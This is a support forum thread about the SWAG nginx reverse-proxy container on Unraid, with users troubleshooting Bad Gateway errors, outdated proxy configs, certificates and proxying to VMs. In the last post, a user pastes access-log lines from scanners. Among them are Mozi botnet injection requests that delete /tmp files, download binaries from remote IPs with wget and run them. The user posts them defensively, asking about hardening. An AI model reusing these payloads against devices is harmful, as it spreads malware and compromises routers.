[Support] Linuxserver.io - SWAG - Secure Web Application Gateway (Nginx/PHP/Certbot/Fail2ban)


5640 posts in this topic Last Reply

Recommended Posts

2 hours ago, Ryguy said:

with the latest update, unfortunately all of my reverse proxies are no longer working.

 

I have it configured to use my own domain, and there is a cname associated to each subdomain. My dynamic dns is resolved with DuckDNS, and I have all of the relevant containers set on proxynet along with the SWAG container.

 

My logs show that the Server is ready, however it is flagging that the Prox-conf files are out of date. Could this be causing the issue? did the templates change materially?

 

The containers in use are Bitwardenrs, Nextcloud, and OMbi

 

Same with me ... I had my server down like for 3 weeks(I had my mainboard in the warenty) and everything worked  plex, gitea, sonarr, deluge, nextcloud ... finally I had all of them working and now all are down again

Funny thing now as an exception for other not working dates(misconfiguration of swag/pipeline until swag) is that swag is validating the certificate for everything domain and the above mentioned subdomains but am still getting Bad Gateway ...

Link to post
  • Replies 5.6k
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Popular Posts

I will only post this once. Feel free to refer folks to this post.   A few points of clarification:   The last update of this image didn't break things. Letsencrypt abruptly disabl

Application Name: SWAG - Secure Web Application Gateway Application Site:  https://docs.linuxserver.io/general/swag Docker Hub: https://hub.docker.com/r/linuxserver/swag Github: https:/

I don't need support.  I just wanted to say thanks for this container and its continuous maintenance.  I started with Aptalca's container then switched to the linuxserver.io container.  Its been close

Posted Images

22 minutes ago, alexandru360 said:

 

Same with me ... I had my server down like for 3 weeks(I had my mainboard in the warenty) and everything worked  plex, gitea, sonarr, deluge, nextcloud ... finally I had all of them working and now all are down again

Funny thing now as an exception for other not working dates(misconfiguration of swag/pipeline until swag) is that swag is validating the certificate for everything domain and the above mentioned subdomains but am still getting Bad Gateway ...

 

After some further investigation I had this lines in my swag log:

**** The following reverse proxy confs have different version dates than the samples that are shipped. ****
**** This may be due to user customization or an update to the samples. ****
**** You should compare them to the samples in the same folder to make sure you have the latest updates. ****
/config/nginx/proxy-confs/sonarr.subdomain.conf
/config/nginx/proxy-confs/plex.subdomain.conf
/config/nginx/proxy-confs/openvpn-as.subdomain.conf
/config/nginx/proxy-confs/nextcloud.subdomain.conf
/config/nginx/proxy-confs/gitea.subdomain.conf

I will investigate and comeback with results ...

Edited by alexandru360
Link to post
5 minutes ago, alexandru360 said:

 

After some further investigation I had this lines in my swag log:

**** The following reverse proxy confs have different version dates than the samples that are shipped. ****
**** This may be due to user customization or an update to the samples. ****
**** You should compare them to the samples in the same folder to make sure you have the latest updates. ****
/config/nginx/proxy-confs/sonarr.subdomain.conf
/config/nginx/proxy-confs/plex.subdomain.conf
/config/nginx/proxy-confs/openvpn-as.subdomain.conf
/config/nginx/proxy-confs/nextcloud.subdomain.conf
/config/nginx/proxy-confs/gitea.subdomain.conf

I will investigate and comeback with results ...

 

Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ...

Just a thought: 
I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case ?

Link to post
1 hour ago, alexandru360 said:

 

Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ...

Just a thought: 
I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case ?

I’m in the same boat. Same log warnings. Can’t figure this out at all. 

Link to post
5 hours ago, alexandru360 said:

 

Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ...

Just a thought: 
I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case ?

Any luck sorting this out???

Link to post
On 1/23/2021 at 5:54 AM, Ryguy said:

Any luck sorting this out???

 

I uninstalled Nerd Tools ... deleted completely SWAG and reinstalled made all the configurations again and still Bad Gateway ... but the main domain works ... I am confused ... I think I have to investigate what Bad Gateway means for Nginx

Link to post
3 hours ago, alexandru360 said:

 

I uninstalled Nerd Tools ... deleted completely SWAG and reinstalled made all the configurations again and still Bad Gateway ... but the main domain works ... I am confused ... I think I have to investigate what Bad Gateway means for Nginx

It means nginx can't connect to the service. So you either have the name/IP/port wrong or not in the same custom bridge as nginx.

Link to post

Hi all---I replaced my cache drives the other day and found when i turned back on dockers that nothing was listed at all.  So I added back in my templates and that seemed to work just fine save my swag docker.

 

Long story short, I ended up renaming the entire /config folder (which was a LONG time in use from very early letsencrypt days) and  and seeing if a complete reinstall worked.  Got caught with the rate limit of letsencrypt.  Is there a way I can move over the certs that were generated in the old /config structure?  Thanks!

 

RESOLVED:  In case anyone comes across this I came across a thread about CA Backup/Restore and completely forgot the app was running on my system.  Did a restore of everything and it's working perfectly now.

Edited by talmania
Link to post
1 hour ago, Moka said:

Hi,
I created a Cloudflare Origin Certificates pem and key. Which folder I need to put them?

For what? This container handles getting the certs.

Link to post
1 hour ago, saarg said:

For what? This container handles getting the certs.

 

I want use Swag with Cloudflare in Full (strict).

 

When I enable Full (strict), I get Invalid SSL certificate.

 

Any idea how to fix that?

Screen Shot 2021-01-27 at 7.05.54 PM.png

Edited by Moka
Link to post

Does anyone know if its possible to use SWAG and point it to a VM not to a docker container at all?

 

Looking as the sample configuration, it seems all the info is pointing to a docker container, is it possible to have it point to a VM instead for hosting other non docker applications?

 

Is it even possible or does this only work for containers? 

 

 

Link to post
1 hour ago, brent3000 said:

Does anyone know if its possible to use SWAG and point it to a VM not to a docker container at all?

 

Looking as the sample configuration, it seems all the info is pointing to a docker container, is it possible to have it point to a VM instead for hosting other non docker applications?

 

Is it even possible or does this only work for containers? 

 

 

Not entirely sure what you mean, but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag. It all depends on how your network is set up. If you can access the site using a lan ip and port on a web browser, you likely can reverse proxy it for wan access.

Link to post
2 minutes ago, jonathanm said:

but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag.

This is what I'm after,

 

If i have a VM running a website (which is access via a local IP, what/how do i build a config or setup so SWAG will direct vm1.domain.com  to a VM?

 

All the sample ones are container based examples? or do i just put the VM name in its place?

Link to post
1 minute ago, brent3000 said:

This is what I'm after,

 

If i have a VM running a website (which is access via a local IP, what/how do i build a config or setup so SWAG will direct vm1.domain.com  to a VM?

 

All the sample ones are container based examples? or do i just put the VM name in its place?

I don't use the samples, I just set things up like a normal nginx install. I learned from tutorials I searched in google. My personal preference is to keep my sites all in one main config file, with common blocks for repeated lines defined in other config files I reference. My install doesn't follow the included examples.

Link to post
17 hours ago, Moka said:

 

I want use Swag with Cloudflare in Full (strict).

 

When I enable Full (strict), I get Invalid SSL certificate.

 

Any idea how to fix that?

Screen Shot 2021-01-27 at 7.05.54 PM.png

 

I don't know what full mode is, but if you need to use certs you get from cloudflare, then I don't think it's possible with swag.

 

Join our discord and you can ask there, as there are more people with more knowledge about swag.

Link to post

Hi guys, I hope someone can help me with this because I've been banging my head against a wall for hours trying to figure out what is going wrong:

 

I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts?

 

I really hope it is something obvious, but I've a bad feeling it isn't ... Please probe if I haven't given enough information.

Link to post
On 2/1/2020 at 6:03 AM, Coolsaber57 said:

I am trying to expose my Octoprint page, but am having trouble finding a configuration that will work.  

 

Here's the examples that Octoprint provides: https://community.octoprint.org/t/reverse-proxy-configuration-examples/1107

 

Here's my current config:

 


server {
    listen 443 ssl;
    listen [::]:443 ssl;

    server_name print.*;

    include /config/nginx/ssl.conf;

    client_max_body_size 0;

    location / {
        include /config/nginx/proxy.conf;
        proxy_pass http://192.168.2.13:80;
        proxy_set_header Host $http_host;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Scheme $scheme;

    }

}

I took out a few lines that were causing the docker container to throw errors.  I'm currently getting a 500 error.  If I copy a config from another container and change the IP/port/subdomain, I do actually get to see the login page, but it says it's offline and asks me to reconnect.

 

Has anyone successfully configured Octoprint in this container? If so, would you be able to share the config?

 

In the following 50 pages, it seems that there is still no solution to this? (I'm running into the same problem)

Link to post
On 1/30/2021 at 4:32 AM, SockDust said:

I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts?

Is there a specific app you are trying to route too? I also followed SI YouTube and it worked a treat, have you checked the log that the domain is clearing correctly or what method are you using (folder or domain level?)

Link to post

Hi all,

 

Over the weekend is setup swag and nextcloud, following spaceinvaderone's guides. (https://scan.nextcloud.com/, gives all A+) I got everything working using my own domain (nexcloud.mydomain.com). I'm not a specialist but, so I'm not very confident about the security. So, I decided to let it running for about 20hrs, and check the logs and enter the ips on abuseipdb.com. I filtered all my activities out and am left with 158 lines in ngix log. Here and example:

https://www.abuseipdb.com/check/74.120.14.53
https://www.abuseipdb.com/check/180.163.220.5
https://www.abuseipdb.com/check/180.163.220.68
https://www.abuseipdb.com/check/27.115.124.70
https://www.abuseipdb.com/check/192.241.215.11

 

Next some lines, of which non are from my ips.

I understand the GET background, logo, ect. But kerbynet and wget from some ip, don't sound good.

GET / HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
POST /GponForm/diag_Form?images/ HTTP/1.1
/tmp/gpon80&ipv=0
POST /boaform/admin/formLogin HTTP/1.1
 400 0 -
GET /portal/redlion HTTP/1.1
HEAD http://112.124.42.80:63435/ HTTP/1.1
CONNECT 112.124.42.80:443 HTTP/1.1
HEAD http://110.242.68.4/ HTTP/1.1
CONNECT 110.242.68.4:443 HTTP/1.1
POST /HNAP1/ HTTP/1.0
\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\x11\xDFJ\x5CN\x8F\xA0\x89[\x9A\x84i=\x8A\x8FA\xEB\x98\xE3\xDB\xFDQ\xD1Iw\xFD\xED
HEAD /robots.txt HTTP/1.0
GET /login HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
GET /actuator/health HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
OPTIONS / HTTP/1.1
HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1
HEAD / HTTP/1.0
GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1
@\x00\x00\x00y0\x12\xD9\x9E9Q\x90\x8A\xED\xEE`\xCC\xB3\xD6|
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
GET /hudson HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1
GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
GET / HTTP/2.0 http://baidu.com/
GET /login HTTP/2.0 http://baidu.com/
GET / HTTP/2.0 
GET /login HTTP/2.0 
GET /apps/files_rightclick/css/app.css?v=46c85d58-8 HTTP/2.0
GET /core/css/guest.css?v=c3182750-8 HTTP/2.0
GET /apps/files_videoplayer/js/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_fileinfo.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_client.js?v=c3182750-8 HTTP/2.0
GET /apps/files_sharing/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /apps/files_pdfviewer/js/files_pdfviewer-public.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/script.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/files.js?v=c3182750-8 HTTP/2.0
GET /apps/theming/js/theming.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/login.js?v=c3182750-8 HTTP/2.0
GET /js/core/merged-template-prepend.js?v=c3182750-8 HTTP/2.0
GET /core/js/oc.js?v=c3182750 HTTP/2.0
GET /apps/theming/styles?v=8 HTTP/2.0
GET /apps/theming/image/logo?useSvg=1&v=8 HTTP/2.0
GET /apps/accessibility/css/user-a82fd95db10ff25dfad39f07372ebe37 HTTP/2.0
GET /core/img/actions/confirm-white.svg?v=2 HTTP/2.0
GET /core/img/loading-dark.gif HTTP/2.0
GET /core/img/actions/toggle.svg HTTP/2.0
GET /apps/theming/image/logo?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/image/background?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/favicon?v=8 HTTP/1.1
GET /csrftoken HTTP/2.0

 

Are there some obvious things I forgot to do?

considering the ip locations, geo blocking wouldn't be a bad idea. I dont leave the country much, so blocking about the whole world exept 2/3 countys would probably be an option.

 

Thanks,

 

edit: found something on geo blocking https://technicalramblings.com/blog/blocking-countries-with-geolite2-using-the-letsencrypt-docker-container/

ofc, running into issues, I'm missing something verry obvious.

Edited by ZekerPixels
Link to post

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.